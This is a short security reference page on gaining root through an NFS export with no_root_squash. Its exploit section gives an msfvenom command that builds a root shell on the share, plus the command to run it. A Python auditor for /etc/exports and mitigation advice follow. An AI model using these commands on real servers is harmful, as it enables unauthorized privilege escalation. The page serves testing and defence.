2022-11-11 01:15:07 +01:00
# NFS NO ROOT SQUASH
2023-08-18 23:05:23 +02:00

Mount the NFS share locally and gain root through an enabled `no_root_squash` option.

When `no_root_squash` is enabled on an NFS share, the `root` user on the client
system retains its full privileges when interacting with files on the share:
the server does not map requests from UID 0 to an unprivileged anonymous user.
In other words, any action performed by `root` on the client system is carried
out with full permissions on the NFS server. This can lead to a security
vulnerability, especially if the client system is compromised or maliciously
manipulated.
## Exploit

### Craft a Shell

Craft a shell and execute it on the NFS share that has `no_root_squash`
enabled to gain root privileges.

```sh
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
```
After the shell has been created on or copied to the share, execute it on the
target share:

```sh
./shell.elf -p
```
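From the server side, the same setting can be audited before anyone mounts the share. The following is an added example, not part of the original page: it parses text in `/etc/exports` syntax and lists every export and client for which `no_root_squash` is in effect. The sample paths and hostnames are constructed, and `find_no_root_squash` is a hypothetical helper name.

```python
import re
import shlex

# Constructed sample in /etc/exports syntax (not taken from the page).
SAMPLE_EXPORTS = r"""
# root_squash is the default when no squash option is given
/srv/home      192.168.56.0/24(rw,sync)
/srv/backup    backup01(rw,no_root_squash) *(ro)
/srv/build -rw,no_root_squash \
    ci01 ci02(ro,root_squash)
"/srv/shared data" 10.0.0.5(rw,all_squash,no_root_squash)
"""

ENTRY = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")  # client(opt,opt,...)


def logical_lines(text):
    """Join backslash-continued lines, drop comments and blank lines."""
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line


def find_no_root_squash(text):
    """Return (export_path, client) pairs whose client root stays UID 0."""
    findings = []
    for line in logical_lines(text):
        path, *fields = shlex.split(line)
        defaults = []
        for field in fields:
            if field.startswith("-"):      # "-opt,opt": defaults for this line
                defaults = field[1:].split(",")
                continue
            match = ENTRY.match(field)
            if match is None:              # malformed entry, leave to exportfs
                continue
            client, opts = match.groups()
            root_squash, all_squash = True, False   # exports(5) defaults
            for opt in defaults + (opts.split(",") if opts else []):
                if opt in ("root_squash", "no_root_squash"):
                    root_squash = opt == "root_squash"
                elif opt in ("all_squash", "no_all_squash"):
                    all_squash = opt == "all_squash"
            # all_squash maps every UID, including 0, to the anonymous user
            if not root_squash and not all_squash:
                findings.append((path, client or "*"))
    return findings


if __name__ == "__main__":
    for path, client in find_no_root_squash(SAMPLE_EXPORTS):
        print(f"no_root_squash: {path} exported to {client}")
```

Exports flagged this way can be returned to the default `root_squash`, and clients can mount the share with `nosuid` so that setuid binaries placed on it are not honoured.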